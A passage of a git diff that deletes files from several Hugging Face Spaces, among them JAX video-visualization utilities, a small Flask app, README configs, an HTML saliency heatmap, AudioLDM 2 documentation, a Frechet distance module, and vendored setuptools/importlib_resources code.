data. - if batch is not None: - images["video"] = video_to_image_grid(batch["video"]) - if "segmentations" in batch: - images["mask"] = video_to_image_grid(convert_categories_to_color( - batch["segmentations"], min_n_colors=min_n_colors)) - if "flow" in batch: - images["flow"] = video_to_image_grid(batch["flow"]) - if "boxes" in batch: - images["boxes"] = draw_bounding_boxes( - batch["video"], - batch["boxes"], - min_n_colors=min_n_colors) - - # Log model predictions. - if preds is not None and preds.get("outputs") is not None: - if "segmentations" in preds["outputs"]: # pytype: disable=attribute-error - images["segmentations"] = video_to_image_grid( - convert_categories_to_color( - preds["outputs"]["segmentations"], min_n_colors=min_n_colors)) - - def shape_fn(x): - if isinstance(x, (np.ndarray, jnp.ndarray)): - return x.shape - - # Log intermediate variables. - if preds is not None and "intermediates" in preds: - - logging.info("intermediates: %s", - jax.tree_map(shape_fn, preds["intermediates"])) - - for key, path in config.debug_var_video_paths.items(): - log_vars = retrieve_from_collection(preds["intermediates"], path) - if log_vars is not None: - if not isinstance(log_vars, Sequence): - log_vars = [log_vars] - for i, log_var in enumerate(log_vars): - log_var = np.array(log_var) # Moves log_var to CPU. - images[key + "_" + str(i)] = video_to_image_grid(log_var) - else: - logging.warning("%s not found in intermediates", path) - - # Log attention weights. - for key, path in config.debug_var_attn_paths.items(): - log_vars = retrieve_from_collection(preds["intermediates"], path) - if log_vars is not None: - if not isinstance(log_vars, Sequence): - log_vars = [log_vars] - for i, log_var in enumerate(log_vars): - log_var = np.array(log_var) # Moves log_var to CPU. - images.update( - prepare_attention_maps_for_logging( - attn_maps=log_var, - key=key + "_" + str(i), - map_width=config.debug_var_attn_widths.get(key), - video=batch["video"], - epsilon=epsilon, - n_samples=n_samples, - n_frames=n_frames)) - else: - logging.warning("%s not found in intermediates", path) - - # Crop each image to a maximum of 3 channels for RGB visualization. - for key, image in images.items(): - if image.shape[-1] > 3: - logging.warning("Truncating channels of %s for visualization.", key) - images[key] = image[Ellipsis, :3] - - return images - - -def prepare_attention_maps_for_logging(attn_maps, key, - map_width, epsilon, - n_samples, n_frames, - video): - """Visualize (overlayed) attention maps as an image grid.""" - images = {} # Results dictionary. - attn_maps = unflatten_image(attn_maps[Ellipsis, None], width=map_width) - - num_heads = attn_maps.shape[2] - for head_idx in range(num_heads): - attn = attn_maps[:n_samples, :n_frames, head_idx] - attn /= attn.max() + epsilon # Standardizes scale for visualization. - # attn.shape: [bs, seq_len, 11, h', w', 1] - - bs, seq_len, _, h_attn, w_attn, _ = attn.shape - images[f"{key}_head_{head_idx}"] = video_to_image_grid(attn) - - # Attention maps are interpretable when they align with object boundaries. - # However, if they are overly smooth then the following visualization which - # overlays attention maps on video is helpful. - video = video[:n_samples, :n_frames] - # video.shape: [bs, seq_len, h, w, 3] - video_resized = [] - for i in range(n_samples): - for j in range(n_frames): - video_resized.append( - skimage.transform.resize(video[i, j], (h_attn, w_attn), order=1)) - video_resized = np.array(video_resized).reshape( - (bs, seq_len, h_attn, w_attn, 3)) - attn_overlayed = attn * np.expand_dims(video_resized, 2) - images[f"{key}_head_{head_idx}_overlayed"] = video_to_image_grid( - attn_overlayed) - - return images - - -def convert_categories_to_color( - inputs, min_n_colors = 1, include_black = True): - """Converts int-valued categories to color in last axis of input tensor. - - Args: - inputs: `np.ndarray` of arbitrary shape with integer entries, encoding the - categories. - min_n_colors: Minimum number of colors (excl. black) to encode categories. - include_black: Include black as 0-th entry in the color palette. Increases - `min_n_colors` by 1 if True. - - Returns: - `np.ndarray` with RGB colors in last axis. - """ - if inputs.shape[-1] == 1: # Strip category axis. - inputs = np.squeeze(inputs, axis=-1) - inputs = np.array(inputs, dtype=np.int32) # Convert to int. - - # Infer number of colors from inputs. - n_colors = int(inputs.max()) + 1 # One color per category incl. 0. - if include_black: - n_colors -= 1 # If we include black, we need one color less. - - if min_n_colors > n_colors: # Use more colors in color palette if requested. - n_colors = min_n_colors - - rgb_colors = get_uniform_colors(n_colors) - - if include_black: # Add black as color for zero-th index. - rgb_colors = np.concatenate((np.zeros((1, 3)), rgb_colors), axis=0) - return rgb_colors[inputs] - - -def get_uniform_colors(n_colors): - """Get n_colors with uniformly spaced hues.""" - hues = np.linspace(0, 1, n_colors, endpoint=False) - hsv_colors = np.concatenate( - (np.expand_dims(hues, axis=1), np.ones((n_colors, 2))), axis=1) - rgb_colors = matplotlib.colors.hsv_to_rgb(hsv_colors) - return rgb_colors # rgb_colors.shape = (n_colors, 3) - - -def unflatten_image(image, width = None): - """Unflatten image array of shape [batch_dims..., height*width, channels].""" - n_channels = image.shape[-1] - # If width is not provided, we assume that the image is square. - if width is None: - width = int(np.floor(np.sqrt(image.shape[-2]))) - height = width - assert width * height == image.shape[-2], "Image is not square." - else: - height = image.shape[-2] // width - return image.reshape(image.shape[:-2] + (height, width, n_channels)) - - -def video_to_image_grid(video): - """Transform video to image grid by folding sequence dim along width.""" - if len(video.shape) == 5: - n_samples, n_frames, height, width, n_channels = video.shape - video = np.transpose(video, (0, 2, 1, 3, 4)) # Swap n_frames and height. - image_grid = np.reshape( - video, (n_samples, height, n_frames * width, n_channels)) - elif len(video.shape) == 6: - n_samples, n_frames, n_slots, height, width, n_channels = video.shape - # Put n_frames next to width. - video = np.transpose(video, (0, 2, 3, 1, 4, 5)) - image_grid = np.reshape( - video, (n_samples, n_slots * height, n_frames * width, n_channels)) - else: - raise ValueError("Unsupported video shape for visualization.") - return image_grid - - -def draw_bounding_boxes(video, - boxes, - min_n_colors = 1, - include_black = True): - """Draw bounding boxes in videos.""" - colors = get_uniform_colors(min_n_colors - include_black) - - b, t, h, w, c = video.shape - n = boxes.shape[2] - image_grid = tf.image.draw_bounding_boxes( - np.reshape(video, (b * t, h, w, c)), - np.reshape(boxes, (b * t, n, 4)), - colors).numpy() - image_grid = np.reshape( - np.transpose(np.reshape(image_grid, (b, t, h, w, c)), - (0, 2, 1, 3, 4)), - (b, h, t * w, c)) - return image_grid - - -def plot_image(ax, image): - """Add an image visualization to a provided `plt.Axes` instance.""" - num_channels = image.shape[-1] - if num_channels == 1: - image = image.reshape(image.shape[:2]) - ax.imshow(image, cmap="viridis") - ax.grid(False) - plt.axis("off") - - -def visualize_image_dict(images, plot_scale = 10): - """Visualize a dictionary of images in colab using maptlotlib.""" - - for key in images.keys(): - logging.info("Visualizing key: %s", key) - n_images = len(images[key]) - fig = plt.figure(figsize=(n_images * plot_scale, plot_scale)) - for idx, image in enumerate(images[key]): - ax = fig.add_subplot(1, n_images, idx+1) - plot_image(ax, image) - plt.show() - - -def filter_key_from_frozen_dict( - frozen_dict, key): - """Filters (removes) an item by key from a flax.core.FrozenDict.""" - if key in frozen_dict: - frozen_dict, _ = frozen_dict.pop(key) - return frozen_dict - - -def prepare_dict_for_logging(nested_dict, parent_key = "", - sep = "_"): - """Prepare a nested dictionary for logging with `clu.metric_writers`. - - Args: - nested_dict: A nested dictionary, e.g. obtained from a - `ml_collections.ConfigDict` via `.to_dict()`. - parent_key: String used in recursion. - sep: String used to separate parent and child keys. - - Returns: - Flattened dict. - """ - items = [] - for k, v in nested_dict.items(): - # Flatten keys of nested elements. - new_key = parent_key + sep + k if parent_key else k - - # Convert None values, lists and tuples to strings. - if v is None: - v = "None" - if isinstance(v, list) or isinstance(v, tuple): - v = str(v) - - # Recursively flatten the dict. - if isinstance(v, dict): - items.extend(prepare_dict_for_logging(v, new_key, sep=sep).items()) - else: - items.append((new_key, v)) - return dict(items) - - -def retrieve_from_collection( - variable_collection, path): - """Finds variables by their path by recursively searching the collection. - - Args: - variable_collection: Nested dict containing the variables (or tuples/lists - of variables). - path: Path to variable in module tree, similar to Unix file names (e.g. - '/module/dense/0/bias'). - - Returns: - The requested variable, variable collection or None (in case the variable - could not be found). - """ - key, _, rpath = path.strip("/").partition("/") - - # In case the variable is not found, we return None. - if (key.isdigit() and not isinstance(variable_collection, Sequence)) or ( - key.isdigit() and int(key) >= len(variable_collection)) or ( - not key.isdigit() and key not in variable_collection): - return None - - if key.isdigit(): - key = int(key) - - if not rpath: - return variable_collection[key] - else: - return retrieve_from_collection(variable_collection[key], rpath) - - -def build_model_from_config(config): - """Build a Flax model from a (nested) ConfigDict.""" - model_constructor = _parse_config(config) - if callable(model_constructor): - return model_constructor() - else: - raise ValueError("Provided config does not contain module constructors.") - - -def _parse_config(config - ): - """Recursively parses a nested ConfigDict and resolves module constructors.""" - - if isinstance(config, list): - return [_parse_config(c) for c in config] - elif isinstance(config, tuple): - return tuple([_parse_config(c) for c in config]) - elif not isinstance(config, ml_collections.ConfigDict): - return config - elif "module" in config: - module_constructor = _resolve_module_constructor(config.module) - kwargs = {k: _parse_config(v) for k, v in config.items() if k != "module"} - return functools.partial(module_constructor, **kwargs) - else: - return {k: _parse_config(v) for k, v in config.items()} - - -def _resolve_module_constructor( - constructor_str): - import_str, _, module_name = constructor_str.rpartition(".") - py_module = importlib.import_module(import_str) - return getattr(py_module, module_name) - - -def get_slices_along_axis( - inputs, - slice_keys, - start_idx = 0, - end_idx = -1, - axis = 2, - pad_value = 0): - """Extracts slices from a dictionary of tensors along the specified axis. - - The slice operation is only applied to `slice_keys` dictionary keys. If - `end_idx` is larger than the actual size of the specified axis, padding is - added (with values provided in `pad_value`). - - Args: - inputs: Dictionary of tensors. - slice_keys: Iterable of strings, the keys for the inputs dictionary for - which to apply the slice operation. - start_idx: Integer, defining the first index to be part of the slice. - end_idx: Integer, defining the end of the slice interval (exclusive). If set - to `-1`, the end index is set to the size of the axis. If a value is - provided that is larger than the size of the axis, zero-padding is added - for the remaining elements. - axis: Integer, the axis along which to slice. - pad_value: Integer, value to be used in padding. - - Returns: - Dictionary of tensors where elements described in `slice_keys` are sliced, - and all other elements are returned as original. - """ - - max_size = None - pad_size = 0 - - # Check shapes and get maximum size of requested axis. - for key in slice_keys: - curr_size = inputs[key].shape[axis] - if max_size is None: - max_size = curr_size - elif max_size != curr_size: - raise ValueError( - "For specified tensors the requested axis needs to be of equal size.") - - # Infer end index if not provided. - if end_idx == -1: - end_idx = max_size - - # Set padding size if end index is larger than maximum size of requested axis. - elif end_idx > max_size: - pad_size = end_idx - max_size - end_idx = max_size - - outputs = {} - for key in slice_keys: - outputs[key] = np.take( - inputs[key], indices=np.arange(start_idx, end_idx), axis=axis) - - # Add padding if necessary. - if pad_size > 0: - pad_shape = np.array(outputs[key].shape) - np.put(pad_shape, axis, pad_size) # In-place op. - padding = pad_value * np.ones(pad_shape, dtype=outputs[key].dtype) - outputs[key] = np.concatenate((outputs[key], padding), axis=axis) - - return outputs - - -def get_element_by_str( - dictionary, multilevel_key, separator = "/" - ): - """Gets element in a dictionary with multilevel key (e.g., "key1/key2").""" - keys = multilevel_key.split(separator) - if len(keys) == 1: - return dictionary[keys[0]] - return get_element_by_str( - dictionary[keys[0]], separator.join(keys[1:]), separator=separator) - - -def set_element_by_str( - dictionary, multilevel_key, new_value, - separator = "/"): - """Sets element in a dictionary with multilevel key (e.g., "key1/key2").""" - keys = multilevel_key.split(separator) - if len(keys) == 1: - if keys[0] not in dictionary: - key_error = ( - "Pretrained {key} was not found in trained model. " - "Make sure you are loading the correct pretrained model " - "or consider adding {key} to exceptions.") - raise KeyError(key_error.format(type="parameter", key=keys[0])) - dictionary[keys[0]] = new_value - else: - set_element_by_str( - dictionary[keys[0]], - separator.join(keys[1:]), - new_value, - separator=separator) - - -def remove_singleton_dim(inputs): - """Removes the final dimension if it is singleton (i.e. of size 1).""" - if inputs is None: - return None - if inputs.shape[-1] != 1: - logging.warning("Expected final dimension of inputs to be 1, " - "received inputs of shape %s: ", str(inputs.shape)) - return inputs - return inputs[Ellipsis, 0] - diff --git a/spaces/opencompass/opencompass-llm-leaderboard/app.py b/spaces/opencompass/opencompass-llm-leaderboard/app.py deleted file mode 100644 index 6d123b2485c4662a4166d80aafef180cbcf2752e..0000000000000000000000000000000000000000 --- a/spaces/opencompass/opencompass-llm-leaderboard/app.py +++ /dev/null @@ -1,12 +0,0 @@ -from flask import Flask, render_template - -app = Flask(__name__) - - -@app.route("/") -def index(): - return render_template("index.html") - - -if __name__ == "__main__": - app.run(debug=False, port=7860, host="0.0.0.0") diff --git a/spaces/optimum/llm-perf-leaderboard/README.md b/spaces/optimum/llm-perf-leaderboard/README.md deleted file mode 100644 index f1fd576468b4f832ee844507a61bc57ff0fda33b..0000000000000000000000000000000000000000 --- a/spaces/optimum/llm-perf-leaderboard/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: LLM-Perf Leaderboard -emoji: 🏆🏋️ -colorFrom: green -colorTo: indigo -sdk: gradio -sdk_version: 3.42.0 -app_file: app.py -pinned: true -license: apache-2.0 -tags: [llm performance leaderboard, llm perf leaderboard, llm, performance, leaderboard] ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git "a/spaces/oskarvanderwal/MT-bias-demo/results/counterfactual_m\303\251rn\303\266k.html" "b/spaces/oskarvanderwal/MT-bias-demo/results/counterfactual_m\303\251rn\303\266k.html" deleted file mode 100644 index 9819c57bd1a7475934e66c8ddb536261b59417e7..0000000000000000000000000000000000000000 --- "a/spaces/oskarvanderwal/MT-bias-demo/results/counterfactual_m\303\251rn\303\266k.html" +++ /dev/null @@ -1,23 +0,0 @@ -
          0th instance:
          - -
          -
          -
          - -
          -
          - Source Saliency Heatmap -
          - x: Generated tokens, y: Attributed tokens -
          - -
          FeatureDescriptionExample
          Alternate glyphsSome letters have alternative forms that can be accessed through stylistic sets or discretionary ligatures.Alternate glyphs example
          FractionsThe font can display fractions automatically or manually using the fraction feature.Fractions example
          Case sensitive formsThe font can adjust the height and shape of punctuation marks and brackets according to the case of the surrounding text.Case sensitive forms example
          Small figuresThe font can display smaller numbers that align with the lowercase letters using the small caps or superior feature.Small figures example
          Arrows and symbolsThe font has a variety of arrows and symbols that can be used for navigation or decoration.Arrows and symbols example
          Old style and tabular figuresThe font can display numbers with varying heights and widths (old style) or with fixed heights and widths (tabular) using the number style feature.Old style and tabular figures example
          corrtemplate${(d3.format('+.2f')(d.corrA)).replace('0.', '.')}${d.orig.replace('[', '').replace(']', '')}
          - -
          ▁He's → ▁She's▁an▁engineer.</s>
          ▁Ő-0.0150.008-0.010.808
          ▁mérnök.0.005-0.004-0.0-1.699
          </s>0.00.00.00.0
          probability-0.3560.0-0.0010.001
          -
      - - - - - diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/api/pipelines/audioldm2.md b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/api/pipelines/audioldm2.md deleted file mode 100644 index e4b2221b2eb5b25aa14fe59bfe34266410de7fec..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/api/pipelines/audioldm2.md +++ /dev/null @@ -1,93 +0,0 @@ - - -# AudioLDM 2 - -AudioLDM 2 was proposed in [AudioLDM 2: Learning Holistic Audio Generation with Self-supervised Pretraining](https://arxiv.org/abs/2308.05734) -by Haohe Liu et al. AudioLDM 2 takes a text prompt as input and predicts the corresponding audio. It can generate -text-conditional sound effects, human speech and music. - -Inspired by [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/overview), AudioLDM 2 -is a text-to-audio _latent diffusion model (LDM)_ that learns continuous audio representations from text embeddings. Two -text encoder models are used to compute the text embeddings from a prompt input: the text-branch of [CLAP](https://huggingface.co/docs/transformers/main/en/model_doc/clap) -and the encoder of [Flan-T5](https://huggingface.co/docs/transformers/main/en/model_doc/flan-t5). These text embeddings -are then projected to a shared embedding space by an [AudioLDM2ProjectionModel](https://huggingface.co/docs/diffusers/main/api/pipelines/audioldm2#diffusers.AudioLDM2ProjectionModel). -A [GPT2](https://huggingface.co/docs/transformers/main/en/model_doc/gpt2) _language model (LM)_ is used to auto-regressively -predict eight new embedding vectors, conditional on the projected CLAP and Flan-T5 embeddings. The generated embedding -vectors and Flan-T5 text embeddings are used as cross-attention conditioning in the LDM. The [UNet](https://huggingface.co/docs/diffusers/main/en/api/pipelines/audioldm2#diffusers.AudioLDM2UNet2DConditionModel) -of AudioLDM 2 is unique in the sense that it takes **two** cross-attention embeddings, as opposed to one cross-attention -conditioning, as in most other LDMs. - -The abstract of the paper is the following: - -*Although audio generation shares commonalities across different types of audio, such as speech, music, and sound effects, designing models for each type requires careful consideration of specific objectives and biases that can significantly differ from those of other types. To bring us closer to a unified perspective of audio generation, this paper proposes a framework that utilizes the same learning method for speech, music, and sound effect generation. Our framework introduces a general representation of audio, called language of audio (LOA). Any audio can be translated into LOA based on AudioMAE, a self-supervised pre-trained representation learning model. In the generation process, we translate any modalities into LOA by using a GPT-2 model, and we perform self-supervised audio generation learning with a latent diffusion model conditioned on LOA. The proposed framework naturally brings advantages such as in-context learning abilities and reusable self-supervised pretrained AudioMAE and latent diffusion models. Experiments on the major benchmarks of text-to-audio, text-to-music, and text-to-speech demonstrate new state-of-the-art or competitive performance to previous approaches.* - -This pipeline was contributed by [sanchit-gandhi](https://huggingface.co/sanchit-gandhi). The original codebase can be -found at [haoheliu/audioldm2](https://github.com/haoheliu/audioldm2). - -## Tips - -### Choosing a checkpoint - -AudioLDM2 comes in three variants. Two of these checkpoints are applicable to the general task of text-to-audio -generation. The third checkpoint is trained exclusively on text-to-music generation. - -All checkpoints share the same model size for the text encoders and VAE. They differ in the size and depth of the UNet. -See table below for details on the three checkpoints: - -| Checkpoint | Task | UNet Model Size | Total Model Size | Training Data / h | -|-----------------------------------------------------------------|---------------|-----------------|------------------|-------------------| -| [audioldm2](https://huggingface.co/cvssp/audioldm2) | Text-to-audio | 350M | 1.1B | 1150k | -| [audioldm2-large](https://huggingface.co/cvssp/audioldm2-large) | Text-to-audio | 750M | 1.5B | 1150k | -| [audioldm2-music](https://huggingface.co/cvssp/audioldm2-music) | Text-to-music | 350M | 1.1B | 665k | - -### Constructing a prompt - -* Descriptive prompt inputs work best: use adjectives to describe the sound (e.g. "high quality" or "clear") and make the prompt context specific (e.g. "water stream in a forest" instead of "stream"). -* It's best to use general terms like "cat" or "dog" instead of specific names or abstract objects the model may not be familiar with. -* Using a **negative prompt** can significantly improve the quality of the generated waveform, by guiding the generation away from terms that correspond to poor quality audio. Try using a negative prompt of "Low quality." - -### Controlling inference - -* The _quality_ of the predicted audio sample can be controlled by the `num_inference_steps` argument; higher steps give higher quality audio at the expense of slower inference. -* The _length_ of the predicted audio sample can be controlled by varying the `audio_length_in_s` argument. - -### Evaluating generated waveforms: - -* The quality of the generated waveforms can vary significantly based on the seed. Try generating with different seeds until you find a satisfactory generation -* Multiple waveforms can be generated in one go: set `num_waveforms_per_prompt` to a value greater than 1. Automatic scoring will be performed between the generated waveforms and prompt text, and the audios ranked from best to worst accordingly. - -The following example demonstrates how to construct good music generation using the aforementioned tips: [example](https://huggingface.co/docs/diffusers/main/en/api/pipelines/audioldm2#diffusers.AudioLDM2Pipeline.__call__.example). - - - -Make sure to check out the Schedulers [guide](/using-diffusers/schedulers) to learn how to explore the tradeoff between -scheduler speed and quality, and see the [reuse components across pipelines](/using-diffusers/loading#reuse-components-across-pipelines) -section to learn how to efficiently load the same components into multiple pipelines. - - - -## AudioLDM2Pipeline -[[autodoc]] AudioLDM2Pipeline - - all - - __call__ - -## AudioLDM2ProjectionModel -[[autodoc]] AudioLDM2ProjectionModel - - forward - -## AudioLDM2UNet2DConditionModel -[[autodoc]] AudioLDM2UNet2DConditionModel - - forward - -## AudioPipelineOutput -[[autodoc]] pipelines.AudioPipelineOutput \ No newline at end of file diff --git a/spaces/paragon-analytics/ResText/README.md b/spaces/paragon-analytics/ResText/README.md deleted file mode 100644 index 10a9b4b1162972cd51d2b721d4e7d3fd191aa8e9..0000000000000000000000000000000000000000 --- a/spaces/paragon-analytics/ResText/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: ResText -emoji: 🚀 -colorFrom: purple -colorTo: green -sdk: gradio -sdk_version: 3.41.2 -app_file: app.py -pinned: false -license: mit -python_version: 3.9.13 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/frechet_distance.py b/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/frechet_distance.py deleted file mode 100644 index 8ce1435aa7eff4d18489193acdba13df391f8a9b..0000000000000000000000000000000000000000 --- a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/frechet_distance.py +++ /dev/null @@ -1,118 +0,0 @@ -#!/usr/bin/env python3 -"""Calculates the Frechet Distance (FD) between two samples. - -Code apapted from https://github.com/bioinf-jku/TTUR to use PyTorch instead -of Tensorflow - -Copyright 2018 Institute of Bioinformatics, JKU Linz - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -""" -import numpy as np -import torch -from scipy import linalg - -def sample_frechet_distance(sample1, sample2, eps=1e-6, - return_components=False): - ''' - Both samples should be numpy arrays. - Returns the Frechet distance. - ''' - (mu1, sigma1), (mu2, sigma2) = [calculate_activation_statistics(s) - for s in [sample1, sample2]] - return calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=eps, - return_components=return_components) - -def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6, - return_components=False): - """Numpy implementation of the Frechet Distance. - The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1) - and X_2 ~ N(mu_2, C_2) is - d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)). - - Stable version by Dougal J. Sutherland. - - Params: - -- mu1 : Numpy array containing the activations of a layer of the - inception net (like returned by the function 'get_predictions') - for generated samples. - -- mu2 : The sample mean over activations, precalculated on an - representative data set. - -- sigma1: The covariance matrix over activations for generated samples. - -- sigma2: The covariance matrix over activations, precalculated on an - representative data set. - - Returns: - -- : The Frechet Distance. - """ - - mu1 = np.atleast_1d(mu1) - mu2 = np.atleast_1d(mu2) - - sigma1 = np.atleast_2d(sigma1) - sigma2 = np.atleast_2d(sigma2) - - assert mu1.shape == mu2.shape, \ - 'Training and test mean vectors have different lengths' - assert sigma1.shape == sigma2.shape, \ - 'Training and test covariances have different dimensions' - - diff = mu1 - mu2 - - # Product might be almost singular - covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False) - if not np.isfinite(covmean).all(): - msg = ('fid calculation produces singular product; ' - 'adding %s to diagonal of cov estimates') % eps - print(msg) - offset = np.eye(sigma1.shape[0]) * eps - covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset)) - - # Numerical error might give slight imaginary component - if np.iscomplexobj(covmean): - if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3): - m = np.max(np.abs(covmean.imag)) - raise ValueError('Imaginary component {}'.format(m)) - covmean = covmean.real - - tr_covmean = np.trace(covmean) - - meandiff = diff.dot(diff) - covdiff = np.trace(sigma1) + np.trace(sigma2) - 2 * tr_covmean - if return_components: - return (meandiff + covdiff, meandiff, covdiff) - else: - return meandiff + covdiff - - -def calculate_activation_statistics(act): - """Calculation of the statistics used by the FID. - Params: - -- files : List of image files paths - -- model : Instance of inception model - -- batch_size : The images numpy array is split into batches with - batch size batch_size. A reasonable batch size - depends on the hardware. - -- dims : Dimensionality of features returned by Inception - -- cuda : If set to True, use GPU - -- verbose : If set to True and parameter out_step is given, the - number of calculated batches is reported. - Returns: - -- mu : The mean over samples of the activations of the pool_3 layer of - the inception model. - -- sigma : The covariance matrix of the activations of the pool_3 layer of - the inception model. - """ - mu = np.mean(act, axis=0) - sigma = np.cov(act, rowvar=False) - return mu, sigma diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pkg_resources/_vendor/importlib_resources/_legacy.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pkg_resources/_vendor/importlib_resources/_legacy.py deleted file mode 100644 index b1ea8105dad6e27eefd5a34f64dfee974a5c4f71..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pkg_resources/_vendor/importlib_resources/_legacy.py +++ /dev/null @@ -1,120 +0,0 @@ -import functools -import os -import pathlib -import types -import warnings - -from typing import Union, Iterable, ContextManager, BinaryIO, TextIO, Any - -from . import _common - -Package = Union[types.ModuleType, str] -Resource = str - - -def deprecated(func): - @functools.wraps(func) - def wrapper(*args, **kwargs): - warnings.warn( - f"{func.__name__} is deprecated. Use files() instead. " - "Refer to https://importlib-resources.readthedocs.io" - "/en/latest/using.html#migrating-from-legacy for migration advice.", - DeprecationWarning, - stacklevel=2, - ) - return func(*args, **kwargs) - - return wrapper - - -def normalize_path(path: Any) -> str: - """Normalize a path by ensuring it is a string. - - If the resulting string contains path separators, an exception is raised. - """ - str_path = str(path) - parent, file_name = os.path.split(str_path) - if parent: - raise ValueError(f'{path!r} must be only a file name') - return file_name - - -@deprecated -def open_binary(package: Package, resource: Resource) -> BinaryIO: - """Return a file-like object opened for binary reading of the resource.""" - return (_common.files(package) / normalize_path(resource)).open('rb') - - -@deprecated -def read_binary(package: Package, resource: Resource) -> bytes: - """Return the binary contents of the resource.""" - return (_common.files(package) / normalize_path(resource)).read_bytes() - - -@deprecated -def open_text( - package: Package, - resource: Resource, - encoding: str = 'utf-8', - errors: str = 'strict', -) -> TextIO: - """Return a file-like object opened for text reading of the resource.""" - return (_common.files(package) / normalize_path(resource)).open( - 'r', encoding=encoding, errors=errors - ) - - -@deprecated -def read_text( - package: Package, - resource: Resource, - encoding: str = 'utf-8', - errors: str = 'strict', -) -> str: - """Return the decoded string of the resource. - - The decoding-related arguments have the same semantics as those of - bytes.decode(). - """ - with open_text(package, resource, encoding, errors) as fp: - return fp.read() - - -@deprecated -def contents(package: Package) -> Iterable[str]: - """Return an iterable of entries in `package`. - - Note that not all entries are resources. Specifically, directories are - not considered resources. Use `is_resource()` on each entry returned here - to check if it is a resource or not. - """ - return [path.name for path in _common.files(package).iterdir()] - - -@deprecated -def is_resource(package: Package, name: str) -> bool: - """True if `name` is a resource inside `package`. - - Directories are *not* resources. - """ - resource = normalize_path(name) - return any( - traversable.name == resource and traversable.is_file() - for traversable in _common.files(package).iterdir() - ) - - -@deprecated -def path( - package: Package, - resource: Resource, -) -> ContextManager[pathlib.Path]: - """A context manager providing a file path object to the resource. - - If the resource does not already exist on its own on the file system, - a temporary file will be created. If the file was created, the file - will be deleted upon exiting the context manager (no exception is - raised if the file was deleted prior to the context manager - exiting). - """ - return _common.as_file(_common.files(package) / normalize_path(resource)) diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/versionpredicate.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/versionpredicate.py deleted file mode 100644 index d6c0c007aad871b9348fea57c9188d0ffd5f10d2..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/versionpredicate.py +++ /dev/null @@ -1,175 +0,0 @@ -"""Module for parsing and testing package version predicate strings. -""" -import re -from . import version -import operator - - -re_validPackage = re.compile(r"(?i)^\s*([a-z_]\w*(?:\.[a-z_]\w*)*)(.*)", re.ASCII) -# (package) (rest) - -re_paren = re.compile(r"^\s*\((.*)\)\s*$") # (list) inside of parentheses -re_splitComparison = re.compile(r"^\s*(<=|>=|<|>|!=|==)\s*([^\s,]+)\s*$") -# (comp) (version) - - -def splitUp(pred): - """Parse a single version comparison. - - Return (comparison string, StrictVersion) - """ - res = re_splitComparison.match(pred) - if not res: - raise ValueError("bad package restriction syntax: %r" % pred) - comp, verStr = res.groups() - with version.suppress_known_deprecation(): - other = version.StrictVersion(verStr) - return (comp, other) - - -compmap = { - "<": operator.lt, - "<=": operator.le, - "==": operator.eq, - ">": operator.gt, - ">=": operator.ge, - "!=": operator.ne, -} - - -class VersionPredicate: - """Parse and test package version predicates. - - >>> v = VersionPredicate('pyepat.abc (>1.0, <3333.3a1, !=1555.1b3)') - - The `name` attribute provides the full dotted name that is given:: - - >>> v.name - 'pyepat.abc' - - The str() of a `VersionPredicate` provides a normalized - human-readable version of the expression:: - - >>> print(v) - pyepat.abc (> 1.0, < 3333.3a1, != 1555.1b3) - - The `satisfied_by()` method can be used to determine with a given - version number is included in the set described by the version - restrictions:: - - >>> v.satisfied_by('1.1') - True - >>> v.satisfied_by('1.4') - True - >>> v.satisfied_by('1.0') - False - >>> v.satisfied_by('4444.4') - False - >>> v.satisfied_by('1555.1b3') - False - - `VersionPredicate` is flexible in accepting extra whitespace:: - - >>> v = VersionPredicate(' pat( == 0.1 ) ') - >>> v.name - 'pat' - >>> v.satisfied_by('0.1') - True - >>> v.satisfied_by('0.2') - False - - If any version numbers passed in do not conform to the - restrictions of `StrictVersion`, a `ValueError` is raised:: - - >>> v = VersionPredicate('p1.p2.p3.p4(>=1.0, <=1.3a1, !=1.2zb3)') - Traceback (most recent call last): - ... - ValueError: invalid version number '1.2zb3' - - It the module or package name given does not conform to what's - allowed as a legal module or package name, `ValueError` is - raised:: - - >>> v = VersionPredicate('foo-bar') - Traceback (most recent call last): - ... - ValueError: expected parenthesized list: '-bar' - - >>> v = VersionPredicate('foo bar (12.21)') - Traceback (most recent call last): - ... - ValueError: expected parenthesized list: 'bar (12.21)' - - """ - - def __init__(self, versionPredicateStr): - """Parse a version predicate string.""" - # Fields: - # name: package name - # pred: list of (comparison string, StrictVersion) - - versionPredicateStr = 